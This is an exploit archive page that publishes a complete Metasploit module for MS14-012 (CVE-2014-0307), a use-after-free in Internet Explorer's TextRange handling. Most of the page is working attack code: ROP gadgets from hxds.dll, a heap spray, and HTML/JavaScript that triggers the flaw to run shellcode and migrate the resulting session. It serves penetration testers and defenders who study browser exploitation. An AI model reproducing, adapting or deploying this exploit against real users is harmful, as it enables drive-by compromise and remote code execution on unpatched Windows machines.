what you don't know can hurt you
Home Files News &[SERVICES_TAB]About Contact Add New

MS14-012 Internet Explorer TextRange Use-After-Free

MS14-012 Internet Explorer TextRange Use-After-Free
Posted Mar 20, 2014
Authored by Jason Kratzer, sinn3r | Site metasploit.com

This Metasploit module exploits a use-after-free vulnerability found in Internet Explorer. The flaw was most likely introduced back in 2013, therefore only certain builds of MSHTML are affected. In our testing with IE9, these vulnerable builds appear to be between 9.0.8112.16496 and 9.0.8112.16533, which implies August 2013 until early March 2014 (before the patch).

tags | exploit
advisories | CVE-2014-0307
SHA-256 | 85541f060fdc844f7022ba1f1028c17d0836c505b9c83aa7c8c91868e0d21f22

MS14-012 Internet Explorer TextRange Use-After-Free

Change Mirror Download
##
# This module requires Metasploit: http//metasploit.com/download
# Current source: https://github.com/rapid7/metasploit-framework
##

require 'msf/core'

class Metasploit3 < Msf::Exploit::Remote
Rank = NormalRanking

include Msf::Exploit::Remote::BrowserExploitServer

def initialize(info={})
super(update_info(info,
'Name' => "MS14-012 Internet Explorer TextRange Use-After-Free",
'Description' => %q{
This module exploits a use-after-free vulnerability found in Internet Explorer. The flaw
was most likely introduced back in 2013, therefore only certain builds of MSHTML are
affected. In our testing with IE9, these vulnerable builds appear to be between
9.0.8112.16496 and 9.0.8112.16533, which implies August 2013 until early March 2014
(before the patch).
},
'License' => MSF_LICENSE,
'Author' =>
[
'Jason Kratzer', # Original discovery
'sinn3r' # Port
],
'References' =>
[
[ 'CVE', '2014-0307' ],
[ 'MSB', 'MS14-012' ]
],
'Platform' => 'win',
'BrowserRequirements' =>
{
:source => /script/i,
:os_name => OperatingSystems::WINDOWS,
:ua_name => HttpClients::IE,
:office => "2010"
#:ua_ver => '9.0' # Some fingerprinting issue w/ os_detect, disabled for now
},
'Targets' =>
[
[
'Automatic',
{
# mov eax,dword ptr [edx+0C4h]; call eax
'Pivot' => 0x0c0d1020 # ECX
}
]
],
'Payload' =>
{
'BadChars' => "\x00",
'PrependEncoder' => "\x81\xc4\x0c\xfe\xff\xff" # add esp, -500
},
'DefaultOptions' =>
{
'Retries' => false, # You're too kind, tab recovery, I only need 1 shell.
'InitialAutoRunScript' => 'migrate -f'
},
'DisclosureDate' => "Mar 11 2014", # Vuln was found in 2013. Mar 11 = Patch tuesday
'DefaultTarget' => 0))
end

# hxds.dll
def get_payload
setup =
[
0x51C3B376, # rop nop
0x51C2046E, # pop edi; ret
0x51BE4A41, # xchg eax, esp; ret
].pack("V*")

# rop nops
45.times { setup << [0x51C3B376].pack('V*') }

setup << [
0x51C2046E, # pop edi ; ret
0x51BD28D4 # mov eax, [ecx], call [eax+8]
].pack('V*')

p = generate_rop_payload('hxds', payload.encoded, {'target'=>'2010', 'pivot'=>setup})

Rex::Text.to_unescape(p)
end

def exploit_html
template = %Q|<!DOCTYPE html>
<html>
<head>
<meta http-equiv='Cache-Control' content='no-cache'/>
<meta http-equiv="X-UA-Compatible" content="IE=edge" >
<script>
<%=js_property_spray%>
sprayHeap({shellcode:unescape("<%=get_payload%>")});

function hxds() {
try {
location.href = 'ms-help:';
} catch(e) {}
}

function strike() {
hxds();
var fake = "";
for (var i = 0; i < 12; i++) {
if (i==0) {
fake += unescape("<%=Rex::Text.to_unescape([target['Pivot']].pack('V*'))%>");
}
else {
fake += "\\u4141\\u4141";
}
}

var elements = [
'FOOTER', 'VIDEO', 'HTML', 'DIV', 'WBR', 'THEAD', 'PARAM', 'SECTION', 'IMG',
'TIME', 'ASISE', 'CANVAS', 'P', 'RT', 'FRAMESET', 'TRACK', 'CAPTION'
];

for (var i = 0; i < elements.length; i++) {
var element = document.createElement(elements[i]);
document.body.appendChild(element);
}

var tRange = document.body.createTextRange();
tRange.moveToElementText(document.body.children[16]);
tRange.execCommand('InsertInputSubmit', true, null);
tRange.moveToElementText(document.body.children[0]);
tRange.moveEnd('character',4);
tRange.execCommand('InsertOrderedList', true, null);
tRange.select();
tRange.moveToElementText(document.body.children[0]);
tRange.moveEnd('character',13);
tRange.execCommand('Underline', true, null);
tRange.execCommand('RemoveFormat', true, null);
var fillObject = document.createElement('button');
fillObject.className = fake;
}
</script>
</head>
<body onload='strike();'></body>
</html>
|

return template, binding()
end

def on_request_exploit(cli, request, target_info)
send_exploit_html(cli, exploit_html)
end

end
Login or Register to add favorites

File Archive:

August 2024

  • Su
  • Mo
  • Tu
  • We
  • Th
  • Fr
  • Sa
  • 1
    Aug 1st
    15 Files
  • 2
    Aug 2nd
    22 Files
  • 3
    Aug 3rd
    0 Files
  • 4
    Aug 4th
    0 Files
  • 5
    Aug 5th
    15 Files
  • 6
    Aug 6th
    11 Files
  • 7
    Aug 7th
    43 Files
  • 8
    Aug 8th
    42 Files
  • 9
    Aug 9th
    36 Files
  • 10
    Aug 10th
    0 Files
  • 11
    Aug 11th
    0 Files
  • 12
    Aug 12th
    27 Files
  • 13
    Aug 13th
    18 Files
  • 14
    Aug 14th
    50 Files
  • 15
    Aug 15th
    33 Files
  • 16
    Aug 16th
    23 Files
  • 17
    Aug 17th
    0 Files
  • 18
    Aug 18th
    0 Files
  • 19
    Aug 19th
    0 Files
  • 20
    Aug 20th
    0 Files
  • 21
    Aug 21st
    0 Files
  • 22
    Aug 22nd
    0 Files
  • 23
    Aug 23rd
    0 Files
  • 24
    Aug 24th
    0 Files
  • 25
    Aug 25th
    0 Files
  • 26
    Aug 26th
    0 Files
  • 27
    Aug 27th
    0 Files
  • 28
    Aug 28th
    0 Files
  • 29
    Aug 29th
    0 Files
  • 30
    Aug 30th
    0 Files
  • 31
    Aug 31st
    0 Files

Top Authors In Last 30 Days

File Tags

Systems

packet storm

© 2022 Packet Storm. All rights reserved.

Services
Security Services
Hosting By
Rokasec
close